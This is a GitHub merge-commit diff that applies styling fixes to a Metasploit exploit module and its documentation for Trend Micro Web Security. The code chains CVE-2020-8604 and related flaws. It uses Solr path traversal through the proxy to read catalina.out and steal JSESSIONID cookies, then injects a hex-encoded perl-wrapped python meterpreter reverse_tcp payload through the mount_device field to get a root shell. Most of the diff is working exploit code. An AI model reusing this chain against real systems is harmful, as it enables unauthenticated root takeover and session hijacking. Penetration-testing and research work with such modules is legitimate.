Merge pull request #2 from h00die/land-13645

fixing up some styling and rubocop run
pedrib · Jun 20, 2020 · f8ea4a0 · f8ea4a0
2 parents 260607e + 6a3633c
commit f8ea4a0
Show file tree

Hide file tree

Showing 2 changed files with 44 additions and 44 deletions.
diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
@@ -7,22 +7,22 @@ The specific flaw exists within the `LogSettingHandler` class of administrator i
 parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage
 this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
 
-Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this
+Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this
 vulnerability to communicate with internal services in the product.
 
-Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file
+Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file`
 parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this
-vulnerability to disclose information in the context of IWSS user.
+vulnerability to disclose information in the context of the `IWSS` user.
 
-Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
+Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user.
 
-Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
+Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
 
-**Vulnerable Application Installation Steps**
+### Vulnerable Application Installation Steps
 
 Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
 
-Following steps are valid on the CentOS 6 x64 bit operating system.
+The following steps are valid on the CentOS 6 x64 bit operating system.
 
 1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
 2. Find "InterScan Web Security Virtual Appliance" and click.
@@ -37,7 +37,7 @@ Following steps are valid on the CentOS 6 x64 bit operating system.
 - 8 GB of memory at least.
 - 60 GB of disk size at least.
 
-**Why Perl wrapper for python stager?**
+### Why perl wrapper for python stager?
 
 Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is
 going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under
@@ -63,13 +63,13 @@ contain any special characters.
 5. Run `check`
 6. **Verify** that you are seeing `The target is vulnerable.`
 7. Run `exploit`
-8. **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.
+8. You should get a root shell
 
 ## Options
 
 ## Scenarios
 
-This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.
+### Trend Micro Web Security 6.5-SP2_Build_Linux_1852
 
 ```
 msf5 > use exploit/linux/http/trendmicro_websecurity_exec

diff --git a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
@@ -8,12 +8,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
+  def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
-        'Description'    => %q{
+        'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
+        'Description' => %q{
           This module exploits multiple vulnerabilities together in order to achive a remote code execution.
           Unauthenticated users can execute a terminal command under the context of the root user.
 
@@ -27,18 +27,18 @@ def initialize(info={})
 
           Last but not least a flaw exists within the Apache Solr application, which is installed within the product.
           When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
-          An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
+          An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
 
           Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
 
           Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
         },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
           ],
-        'References'     =>
+        'References' =>
           [
             ['CVE', '2020-8604'],
             ['CVE', '2020-8605'],
@@ -47,25 +47,25 @@ def initialize(info={})
             ['ZDI', '20-677'],
             ['ZDI', '20-678']
           ],
-        'Privileged'     => true,
+        'Privileged' => true,
         'DefaultOptions' =>
           {
             'SSL' => true,
             'payload' => 'python/meterpreter/reverse_tcp',
-            'WfsDelay'     => 30
+            'WfsDelay' => 30
           },
-          'Payload'        =>
+        'Payload' =>
           {
-            'Compat'   =>
+            'Compat' =>
             {
               'ConnectionType' => '-bind'
             }
           },
-        'Platform'       => ['python'],
-        'Arch'           => ARCH_PYTHON,
-        'Targets'        => [ ['Automatic', {}] ],
+        'Platform' => ['python'],
+        'Arch' => ARCH_PYTHON,
+        'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2020-06-10',
-        'DefaultTarget'  => 0,
+        'DefaultTarget' => 0,
         'Notes' =>
           {
             'Stability' => [CRASH_SAFE],
@@ -92,19 +92,19 @@ def hijack_cookie
     port_restore = datastore['RPORT']
     datastore['RPORT'] = datastore['PROXY_PORT']
 
-    @jsessionid = ""
+    @jsessionid = ''
 
     # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
     print_status('Trying to extract session ID by exploiting reverse proxy service')
 
     res = send_request_cgi({
-    'method' => 'GET',
-    'uri'    => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
-    'vars_get' => {
-      'command' => 'filecontent',
-      'wt'      => 'filestream',
-      'generation' => 1,
-      'file'    => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
+      'method' => 'GET',
+      'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
+      'vars_get' => {
+        'command' => 'filecontent',
+        'wt' => 'filestream',
+        'generation' => 1,
+        'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
       }
     })
 
@@ -132,20 +132,20 @@ def hijack_cookie
       return
     end
 
-    print_good("Extracted number of JSESSIONID : #{cookies.length}")
+    print_good("Extracted number of JSESSIONID: #{cookies.length}")
 
     # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
     datastore['SSL'] = true if ssl_restore
     datastore['RPORT'] = port_restore
 
     # Latest cookie in the log file is the one most probably active. So that we use reverse on array.
-    cookies.reverse.each_with_index  do |cookie, index|
+    cookies.reverse.each_with_index do |cookie, index|
       print_status("Testing JSESSIONID ##{index} : #{cookie}")
 
       # This endpoints is basically check session :)
       res = send_request_cgi({
         'method' => 'GET',
-        'uri'    => normalize_uri('rest', 'commonlog', 'get_sessionID'),
+        'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
         'cookie' => "JSESSIONID=#{cookie}"
       })
 
@@ -156,12 +156,12 @@ def hijack_cookie
 
       # If the cookie is active !
       if res.code == 200 && res.body.include?('session_flag')
-        print_good("Awesome !!! JESSIONID ##{index} is active.")
+        print_good("Awesome!!! JESSIONID ##{index} is active.")
         @jsessionid = cookie
         break
       end
 
-      print_warning("JSESSIONID ##{index} is inactive ! Moving to the next one.")
+      print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
     end
 
     if @jsessionid.empty?
@@ -217,20 +217,20 @@ def exploit
     # For that reason, I am planting our payload dropper within the perl command.
 
     cmd = "python -c \"#{payload.encoded}\""
-    final_payload = cmd.to_s.unpack("H*").first
+    final_payload = cmd.to_s.unpack1('H*')
     p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
 
     vars_post = {
-        mount_device: "mount $(#{p}) /var/offload",
-        cmd: 'mount'
+      mount_device: "mount $(#{p}) /var/offload",
+      cmd: 'mount'
     }
 
     send_request_cgi({
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
+      'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
       'cookie' => "JSESSIONID=#{@jsessionid}",
-      'ctype'  => 'application/json',
-      'data'   => vars_post.to_json
+      'ctype' => 'application/json',
+      'data' => vars_post.to_json
     })
   end
 end